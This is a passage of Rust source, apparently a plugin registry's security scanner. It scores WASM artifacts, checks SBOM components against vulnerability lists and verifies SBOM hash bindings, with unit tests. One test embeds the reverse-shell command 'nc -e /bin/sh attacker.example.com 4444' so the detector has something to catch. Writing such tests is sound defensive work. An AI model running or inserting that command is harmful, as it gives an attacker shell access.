997    let mut checked = 0usize;
998    let mut score_delta: i32 = 0;
999    for comp in components {
1000        let Some((ecosystem, name, version)) = parse_component(comp) else {
1001            continue;
1002        };
1003        checked += 1;
1004
1005        let matches = match store.find_osv_matches(&ecosystem, &name, &version).await {
1006            Ok(m) => m,
1007            Err(e) => {
1008                warn!("osv lookup failed for {}:{}@{}: {}", ecosystem, name, version, e);
1009                continue;
1010            }
1011        };
1012
1013        for m in matches {
1014            let penalty: i32 = match m.severity.as_str() {
1015                "critical" => 40,
1016                "high" => 20,
1017                "medium" => 8,
1018                _ => 3,
1019            };
1020            score_delta = score_delta.saturating_add(penalty);
1021            append_finding(
1022                outcome,
1023                json!({
1024                    "severity": m.severity,
1025                    "category": "vulnerable_dependency",
1026                    "title": format!(
1027                        "{}: {}:{}@{}",
1028                        m.advisory_id, ecosystem, name, version
1029                    ),
1030                    "description": m.summary,
1031                }),
1032            );
1033        }
1034    }
1035
1036    append_finding(
1037        outcome,
1038        json!({
1039            "severity": "info",
1040            "category": "other",
1041            "title": "SBOM scanned against OSV cache",
1042            "description": format!(
1043                "Checked {} component(s) against the live OSV advisory cache.",
1044                checked
1045            )
1046        }),
1047    );
1048
1049    if score_delta > 0 {
1050        let current = outcome.score as i32;
1051        let new = (current - score_delta).clamp(0, 100);
1052        outcome.score = new as i16;
1053        outcome.status = if new >= 70 {
1054            outcome.status.clone()
1055        } else if new >= 40 {
1056            "warning".to_string()
1057        } else {
1058            "fail".to_string()
1059        };
1060    }
1061}
1062
1063/// Parse the SBOM, scan its components against the hardcoded vulnerability
1064/// list, and append findings (+ decrement the score) on `outcome` in place.
1065///
1066/// The parser is intentionally forgiving: unknown/unexpected shapes just
1067/// record an informational finding. We never fail the whole scan because
1068/// the SBOM itself is malformed — that would be hostile to publishers
1069/// experimenting with the feature.
1070fn apply_sbom_findings(outcome: &mut ScanOutcome, sbom: &JsonValue) {
1071    let components = match sbom.get("components").and_then(|c| c.as_array()) {
1072        Some(c) => c,
1073        None => {
1074            append_finding(
1075                outcome,
1076                json!({
1077                    "severity": "info",
1078                    "category": "other",
1079                    "title": "SBOM has no 'components' array",
1080                    "description": "Expected CycloneDX-shaped SBOM with a top-level 'components' array. Vulnerability check skipped."
1081                }),
1082            );
1083            return;
1084        }
1085    };
1086
1087    let mut checked = 0usize;
1088    let mut score_delta: i32 = 0;
1089    for comp in components {
1090        // CycloneDX: { "name": "...", "version": "...", "purl": "pkg:npm/foo@1.2.3", ... }
1091        // We support either (name, version, type) or just purl.
1092        let Some((ecosystem, name, version)) = parse_component(comp) else {
1093            continue;
1094        };
1095        checked += 1;
1096
1097        for (vuln_eco, vuln_name, vuln_prefix, severity, description) in KNOWN_VULNERABLE_PACKAGES {
1098            if *vuln_eco != ecosystem || *vuln_name != name {
1099                continue;
1100            }
1101            if !vuln_prefix.is_empty() && !version.starts_with(vuln_prefix) {
1102                continue;
1103            }
1104            let penalty: i32 = match *severity {
1105                "critical" => 40,
1106                "high" => 20,
1107                "medium" => 8,
1108                _ => 3,
1109            };
1110            score_delta = score_delta.saturating_add(penalty);
1111            append_finding(
1112                outcome,
1113                json!({
1114                    "severity": severity,
1115                    "category": "vulnerable_dependency",
1116                    "title": format!("Known-bad dependency: {}:{}@{}", ecosystem, name, version),
1117                    "description": description,
1118                }),
1119            );
1120        }
1121    }
1122
1123    append_finding(
1124        outcome,
1125        json!({
1126            "severity": "info",
1127            "category": "other",
1128            "title": "SBOM scanned",
1129            "description": format!(
1130                "Checked {} component(s) against {} known-vulnerable entries.",
1131                checked,
1132                KNOWN_VULNERABLE_PACKAGES.len()
1133            )
1134        }),
1135    );
1136
1137    if score_delta > 0 {
1138        let current = outcome.score as i32;
1139        let new = (current - score_delta).clamp(0, 100);
1140        outcome.score = new as i16;
1141        // If we dropped below the pass threshold, downgrade the verdict.
1142        outcome.status = if new >= 70 {
1143            outcome.status.clone()
1144        } else if new >= 40 {
1145            "warning".to_string()
1146        } else {
1147            "fail".to_string()
1148        };
1149    }
1150}
1151
1152/// Extract `(ecosystem, name, version)` from a CycloneDX-shaped component.
1153/// Handles both the `purl` shortcut and the explicit `{type, name, version}`
1154/// triple. Returns `None` for components that are too underspecified to
1155/// cross-reference (which we silently skip rather than flag).
1156fn parse_component(comp: &JsonValue) -> Option<(String, String, String)> {
1157    if let Some(purl) = comp.get("purl").and_then(|v| v.as_str()) {
1158        // pkg:ecosystem/name@version
1159        if let Some(rest) = purl.strip_prefix("pkg:") {
1160            let mut parts = rest.splitn(2, '/');
1161            let ecosystem = parts.next()?.to_ascii_lowercase();
1162            let name_ver = parts.next()?;
1163            let mut nv = name_ver.splitn(2, '@');
1164            let name = nv.next()?.to_string();
1165            let version = nv.next().unwrap_or("").to_string();
1166            return Some((ecosystem, name, version));
1167        }
1168    }
1169    let name = comp.get("name")?.as_str()?.to_string();
1170    let version = comp.get("version").and_then(|v| v.as_str()).unwrap_or("").to_string();
1171    // "type" in CycloneDX is "library" etc; we infer ecosystem from
1172    // `purl` when available, otherwise fall back to "unknown".
1173    let ecosystem = comp
1174        .get("group")
1175        .and_then(|v| v.as_str())
1176        .map(str::to_ascii_lowercase)
1177        .unwrap_or_else(|| "unknown".to_string());
1178    Some((ecosystem, name, version))
1179}
1180
1181fn append_finding(outcome: &mut ScanOutcome, finding: JsonValue) {
1182    match &mut outcome.findings {
1183        JsonValue::Array(arr) => arr.push(finding),
1184        _ => {
1185            outcome.findings = JsonValue::Array(vec![finding]);
1186        }
1187    }
1188}
1189
1190fn hex_encode(bytes: &[u8]) -> String {
1191    const HEX: &[u8; 16] = b"0123456789abcdef";
1192    let mut out = String::with_capacity(bytes.len() * 2);
1193    for b in bytes {
1194        out.push(HEX[(b >> 4) as usize] as char);
1195        out.push(HEX[(b & 0x0f) as usize] as char);
1196    }
1197    out
1198}
1199
1200#[cfg(test)]
1201mod tests {
1202    use super::*;
1203
1204    /// Minimal legal WASM module: magic + version + nothing else. Parses
1205    /// cleanly via wasmparser.
1206    const EMPTY_WASM: &[u8] = b"\0asm\x01\x00\x00\x00";
1207
1208    fn sha256_hex(bytes: &[u8]) -> String {
1209        hex_encode(&Sha256::digest(bytes))
1210    }
1211
1212    #[test]
1213    fn hex_encode_matches_sha2_hex_crate() {
1214        let digest = Sha256::digest(b"hello world");
1215        assert_eq!(hex_encode(&digest), hex::encode(digest));
1216    }
1217
1218    #[test]
1219    fn contains_subslice_edge_cases() {
1220        assert!(!contains_subslice(b"", b"abc"));
1221        assert!(!contains_subslice(b"ab", b"abc"));
1222        assert!(!contains_subslice(b"ab", b""));
1223        assert!(contains_subslice(b"abcdef", b"cde"));
1224        assert!(contains_subslice(b"abcdef", b"a"));
1225        assert!(contains_subslice(b"abcdef", b"f"));
1226        assert!(!contains_subslice(b"abcdef", b"xyz"));
1227    }
1228
1229    #[test]
1230    fn analyze_empty_module_is_clean() {
1231        let checksum = sha256_hex(EMPTY_WASM);
1232        let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, &checksum);
1233        assert_eq!(outcome.status, "pass");
1234        assert!(outcome.score >= 70, "expected passing score, got {}", outcome.score);
1235    }
1236
1237    #[test]
1238    fn analyze_rejects_non_wasm_magic() {
1239        let junk = b"not-a-wasm-file";
1240        let outcome = analyze_bytes(junk, junk.len() as i64, &sha256_hex(junk));
1241        assert_eq!(outcome.status, "fail");
1242        assert_eq!(outcome.score, 0);
1243        let findings = outcome.findings.as_array().unwrap();
1244        assert!(findings
1245            .iter()
1246            .any(|f| f["title"].as_str().unwrap().contains("Not a valid WebAssembly module")));
1247    }
1248
1249    #[test]
1250    fn analyze_flags_checksum_mismatch() {
1251        let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, "deadbeef");
1252        let findings = outcome.findings.as_array().unwrap();
1253        assert!(findings.iter().any(|f| f["title"].as_str().unwrap() == "Checksum mismatch"));
1254        assert!(outcome.score < 50);
1255    }
1256
1257    #[test]
1258    fn analyze_flags_size_mismatch() {
1259        let outcome = analyze_bytes(EMPTY_WASM, 999_999, &sha256_hex(EMPTY_WASM));
1260        let findings = outcome.findings.as_array().unwrap();
1261        assert!(findings
1262            .iter()
1263            .any(|f| f["title"].as_str().unwrap() == "Artifact size mismatch"));
1264    }
1265
1266    #[test]
1267    fn analyze_detects_suspicious_byte_pattern() {
1268        // Append a known-bad marker after a valid empty module; the WASM
1269        // parser will stop after the fixed header but the byte-pattern
1270        // scan still fires.
1271        let mut bytes = EMPTY_WASM.to_vec();
1272        bytes.extend_from_slice(b"nc -e /bin/sh attacker.example.com 4444");
1273        let checksum = sha256_hex(&bytes);
1274        let outcome = analyze_bytes(&bytes, bytes.len() as i64, &checksum);
1275        assert_eq!(outcome.status, "fail");
1276        let findings = outcome.findings.as_array().unwrap();
1277        assert!(findings.iter().any(|f| {
1278            f["title"].as_str().unwrap().contains("reverse shell")
1279                || f["title"].as_str().unwrap().contains("Suspicious byte pattern")
1280        }));
1281    }
1282
1283    #[test]
1284    fn analyze_flags_unexpected_wasm_version() {
1285        // Valid magic, bogus version 2.
1286        let bytes = b"\0asm\x02\x00\x00\x00";
1287        let checksum = sha256_hex(bytes);
1288        let outcome = analyze_bytes(bytes, bytes.len() as i64, &checksum);
1289        let findings = outcome.findings.as_array().unwrap();
1290        assert!(findings
1291            .iter()
1292            .any(|f| f["title"].as_str().unwrap() == "Unexpected WASM binary version"));
1293    }
1294
1295    fn clean_outcome() -> ScanOutcome {
1296        ScanOutcome {
1297            status: "pass".to_string(),
1298            score: 100,
1299            findings: JsonValue::Array(vec![]),
1300        }
1301    }
1302
1303    #[test]
1304    fn sbom_flags_known_bad_via_purl() {
1305        let sbom = serde_json::json!({
1306            "components": [
1307                { "purl": "pkg:npm/event-stream@3.3.6" },
1308                { "purl": "pkg:npm/leftpad@1.0.0" }, // clean
1309            ]
1310        });
1311        let mut outcome = clean_outcome();
1312        apply_sbom_findings(&mut outcome, &sbom);
1313        assert_eq!(outcome.status, "warning"); // 100 - 40 = 60
1314        assert_eq!(outcome.score, 60);
1315        let findings = outcome.findings.as_array().unwrap();
1316        assert!(findings.iter().any(|f| f["title"].as_str().unwrap().contains("event-stream")));
1317    }
1318
1319    #[test]
1320    fn sbom_flags_version_prefix_match() {
1321        // openssl-src entry uses prefix "111.0." — should match 111.0.5 but
1322        // not 300.1.0.
1323        let sbom = serde_json::json!({
1324            "components": [
1325                { "purl": "pkg:cargo/openssl-src@111.0.5" },
1326                { "purl": "pkg:cargo/openssl-src@300.1.0" },
1327            ]
1328        });
1329        let mut outcome = clean_outcome();
1330        apply_sbom_findings(&mut outcome, &sbom);
1331        let findings = outcome.findings.as_array().unwrap();
1332        let hits: Vec<_> = findings
1333            .iter()
1334            .filter(|f| f["title"].as_str().unwrap().contains("openssl-src"))
1335            .collect();
1336        assert_eq!(hits.len(), 1, "only the 111.0.x row should match");
1337    }
1338
1339    #[test]
1340    fn sbom_clean_manifest_passes() {
1341        let sbom = serde_json::json!({
1342            "components": [
1343                { "purl": "pkg:npm/leftpad@1.0.0" },
1344                { "purl": "pkg:cargo/serde@1.0.200" },
1345            ]
1346        });
1347        let mut outcome = clean_outcome();
1348        apply_sbom_findings(&mut outcome, &sbom);
1349        assert_eq!(outcome.status, "pass");
1350        assert_eq!(outcome.score, 100);
1351    }
1352
1353    #[test]
1354    fn sbom_malformed_records_informational_finding() {
1355        let sbom = serde_json::json!({ "wrong_root": [] });
1356        let mut outcome = clean_outcome();
1357        apply_sbom_findings(&mut outcome, &sbom);
1358        // Score stays 100; we just note that we couldn't read it.
1359        assert_eq!(outcome.status, "pass");
1360        assert_eq!(outcome.score, 100);
1361        let findings = outcome.findings.as_array().unwrap();
1362        assert!(findings
1363            .iter()
1364            .any(|f| f["title"].as_str().unwrap().contains("no 'components'")));
1365    }
1366
1367    #[test]
1368    fn sbom_binding_bound_when_digest_matches() {
1369        let sbom = serde_json::json!({
1370            "metadata": {
1371                "component": {
1372                    "name": "my-plugin",
1373                    "hashes": [
1374                        { "alg": "SHA-256", "content": "DEADbeef" }
1375                    ]
1376                }
1377            }
1378        });
1379        let binding = verify_sbom_binding(&sbom, "deadbeef");
1380        assert!(matches!(binding, SbomBinding::Bound));
1381    }
1382
1383    #[test]
1384    fn sbom_binding_unsigned_when_no_digest() {
1385        let sbom = serde_json::json!({
1386            "components": [
1387                { "purl": "pkg:npm/leftpad@1.0.0" }
1388            ]
1389        });
1390        let binding = verify_sbom_binding(&sbom, "deadbeef");
1391        assert!(matches!(binding, SbomBinding::Unsigned));
1392    }
1393
1394    #[test]
1395    fn sbom_binding_mismatch_when_digest_disagrees() {
1396        let sbom = serde_json::json!({
1397            "metadata": {
1398                "component": {
1399                    "hashes": [
1400                        { "alg": "SHA-256", "content": "aaaa1111" }
1401                    ]
1402                }
1403            }
1404        });
1405        let binding = verify_sbom_binding(&sbom, "bbbb2222");
1406        match binding {
1407            SbomBinding::Mismatch { declared } => {
1408                assert_eq!(declared, "aaaa1111");
1409            }
1410            other => panic!("expected Mismatch, got {:?}", other),
1411        }
1412    }
1413
1414    #[test]
1415    fn sbom_binding_walks_component_hashes_too() {
1416        // Some CycloneDX exporters put hashes on components[] instead of
1417        // metadata.component. Both should be consulted.
1418        let sbom = serde_json::json!({
1419            "components": [
1420                {
1421                    "name": "my-plugin",
1422                    "hashes": [
1423                        { "alg": "sha-256", "content": "CAFEBABE" }
1424                    ]
1425                }
1426            ]
1427        });
1428        let binding = verify_sbom_binding(&sbom, "cafebabe");
1429        assert!(matches!(binding, SbomBinding::Bound));
1430    }
1431
1432    #[test]
1433    fn record_binding_mismatch_downgrades_outcome() {
1434        let mut outcome = clean_outcome();
1435        record_sbom_binding(
1436            &mut outcome,
1437            &SbomBinding::Mismatch {
1438                declared: "aaaa1111".to_string(),
1439            },
1440        );
1441        // 100 - 60 = 40 → warning threshold.
1442        assert_eq!(outcome.score, 40);
1443        assert_eq!(outcome.status, "warning");
1444
1445        // A second artifact that was already warning-grade before the
1446        // mismatch should drop straight into fail.
1447        let mut warn_outcome = ScanOutcome {
1448            status: "warning".to_string(),
1449            score: 60,
1450            findings: JsonValue::Array(vec![]),
1451        };
1452        record_sbom_binding(
1453            &mut warn_outcome,
1454            &SbomBinding::Mismatch {
1455                declared: "aaaa1111".to_string(),
1456            },
1457        );
1458        assert_eq!(warn_outcome.score, 0);
1459        assert_eq!(warn_outcome.status, "fail");
1460    }
1461
1462    #[test]
1463    fn record_binding_unsigned_keeps_pass_with_minor_penalty() {
1464        let mut outcome = clean_outcome();
1465        record_sbom_binding(&mut outcome, &SbomBinding::Unsigned);
1466        assert_eq!(outcome.status, "pass");
1467        assert_eq!(outcome.score, 95);
1468    }
1469}